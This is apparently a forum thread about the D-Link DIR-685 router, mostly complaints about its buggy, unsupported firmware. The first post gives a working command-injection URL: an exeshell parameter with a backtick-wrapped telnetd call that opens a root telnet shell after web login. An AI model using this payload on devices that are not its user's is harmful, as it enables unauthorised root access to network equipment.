It looks like it is very easy to get root/telnet access to dir-685.

After logging into web interface just browse to
http://<dir-685-ip>/sys_config_valid.xgi?exeshell=%60telnetd%60
then you have telnetd available which runs as root.

Have this router in the office, dunno why it was the choice to go with but the firmware is a joke, the list of bugs are long and they wont release any more versions for it it seems, most annoying is the bug where the WIFI goes down and up way to often disconnecting any remote connections i have atm :/

a good firmware for this is totally worth spending some bucks on.

Read on the first page but didn't really get the technical stuff. is it possible to fix this one at all?
